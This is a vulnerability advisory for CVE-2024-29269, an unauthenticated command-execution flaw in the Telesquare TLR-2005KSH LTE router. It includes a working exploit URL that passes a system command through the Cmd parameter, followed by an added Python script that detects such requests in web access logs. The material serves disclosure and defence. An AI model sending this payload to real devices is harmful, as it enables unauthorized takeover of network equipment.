\[CVE ID\] CVE-2024-29269
\[Vulnerability name\] Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability
\[Description\] Telesquare TLR-2005KSH is an SK Telecom LTE router from South Korea's Telesquare company. Telesquare TLR-2005KSH versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
\[Payload\] /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig
\[Vulnerability details\]
1. Vulnerability page. ![image](https://images.seebug.org/1718273768640-w331s)
2. Construct the command execution request and successfully execute the system ifconfig command. ![image](https://images.seebug.org/1718273769830-w331s)
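
A detection sketch for the request pattern in the payload above, added here and not part of the original advisory: it scans web access log lines for requests to `/cgi-bin/admin.cgi` that carry `Command=sysCommand` together with a `Cmd` parameter, regardless of parameter order or percent-encoding. The Common Log Format input, the sample lines, the `otherAction` value and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed input: Common/Combined Log Format lines from a proxy or web server
# in front of the router's management interface.
LOG_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
CGI_PATH = "/cgi-bin/admin.cgi"  # path from the advisory's payload


def match_syscommand(line):
    """Return a finding dict when the line requests admin.cgi with
    Command=sysCommand and a Cmd parameter, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Decode percent-encoding and collapse repeated slashes before comparing.
    path = re.sub(r"/+", "/", unquote(url.path))
    if path != CGI_PATH:
        return None
    # parse_qs decodes values, so parameter order and encoding do not matter.
    params = parse_qs(url.query, keep_blank_values=True)
    if "sysCommand" not in params.get("Command", []) or "Cmd" not in params:
        return None
    return {"src": m["src"], "status": int(m["status"]), "cmd": params["Cmd"][0]}


def scan(lines):
    """Collect findings from an iterable of log lines."""
    return [f for f in map(match_syscommand, lines) if f]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jun/2024:10:12:44 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1" 200 512',
    '192.0.2.11 - - [13/Jun/2024:10:13:02 +0000] "GET /cgi-bin//admin.cgi?Cmd=ifconfig&Command=sysCommand HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Jun/2024:10:14:10 +0000] "GET /cgi-bin/admin.cgi?Command=otherAction HTTP/1.1" 200 120',
    '198.51.100.8 - - [13/Jun/2024:10:15:31 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the request needs no authentication, any hit from an address outside the management network is worth triage; the recorded status code shows whether the device answered the request.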